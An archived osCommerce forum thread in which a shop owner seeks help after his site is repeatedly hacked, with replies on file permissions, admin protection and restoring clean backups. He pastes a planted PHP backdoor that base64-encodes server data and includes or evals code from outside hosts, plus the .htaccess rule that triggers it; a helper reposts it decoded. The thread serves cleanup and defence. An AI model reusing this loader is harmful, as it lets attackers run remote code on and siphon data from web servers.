Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Site getting Hacked


Forestshopkeeper

Recommended Posts

My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.

Thanks

Jim

 

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel.

 

Also be sure to install these mods

 

That should take care of the problem.

Link to comment
Share on other sites

Your images folder still has hack PHP files in it (looks to me like).

 

If it's set at 777 permissions, there's probably your weak point.

 

Folder permissions should not be higher than 755.

 

File permissions probably not higher than 644.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.

Link to comment
Share on other sites

Your images folder still has hack PHP files in it (looks to me like).

 

If it's set at 777 permissions, there's probably your weak point.

 

Folder permissions should not be higher than 755.

 

File permissions probably not higher than 644.

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referenceing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.

Jim

Link to comment
Share on other sites

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel.

 

Also be sure to install these mods

 

That should take care of the problem.

Thanks. I am working on the mods. I set the folders at 755. files are 644

Jim

Link to comment
Share on other sites

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.

Thanks for the info.

Jim

Link to comment
Share on other sites

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referenceing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.

Jim

Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777

Jim

Link to comment
Share on other sites

If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755.

 

Either that or get your hosting company to sort out their security.

 

Vger

Link to comment
Share on other sites

Recheck your images folder for hack PHP files:

 

 019667.php			  23-May-2008 22:30	 1k  
1019667.php			 24-Aug-2008 01:55	 1k  
19667.php			   20-Mar-2008 02:59	 1k

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755

 

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php

 

Good luck

Link to comment
Share on other sites

They look like the same type of hacked that got me last March.

 

If so, It's not a destructive nor information stealing type of hack.

 

It's a "pay per click" scam.

 

They stick these bogus PHP files around, then seed search engines with links to them, then just set back and rake in the dough (so I've been told).

 

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

 

Just be sure all the folder permission are no higher than 755 and keep an eye on things for a while.

 

If no more hack files show up, you should be OK.

 

By the way, better check your admin folder too, especially your backups folder for your database.

 

They got me there, too.

:blush:

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755

 

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php

 

Good luck

I am looking at some .htaccess files in my admin folder:

 

This script is in a file called 220009.php

 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

 

This is what is in the .htaccess file in my backups folder

 

Options -MultiViews

ErrorDocument 404 //admin/backups/220009.php

 

 

In 2007 I did not even have a backups folder, and now I send everything to my computer. I am pulling these files for now and setting the permissions to 755 on these folders.

 

What else can I do?

Jim

Link to comment
Share on other sites

Both of the files you posted about in the backups folder are bad. Delete them.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I can't tell you what it does because the main payload(s) rely on something from another server.

 

All I can do is make it easier to read (reformatted, decoded, commented, and simplified as much as possible):

 

<? error_reporting(0);
$s="e";
// get info about this site/page/server
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// encode it
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ("http://a.rsdcraft.ws/?".$str);
else if ("http://ad.runweb.info/?".$str);
else eval("http://7.xmldata.info/?".$str);
?>

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

no no.. I would not delete and reinstall. It would be easier to manually inspect every file in every folder.

 

I was suggesting that he delete everything and re-install his last backup. And preferably, that backup should be a set of working files that have never actually resided on the webspace.

 

IMO, everyone should modify files locally and then upload them to their server and occasionally make a copy of those local files and set them aside as a snapshot just for this sort of thing. That way, you can delete the entire site and reload a current set of files. It should take less than half an hour even on a slow connection.

 

Unfortunately, some people modify the files live on the server and don't have local files. Those that do backup, (ie - download a full set of files from the server) have a backup of files that could have been infected.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...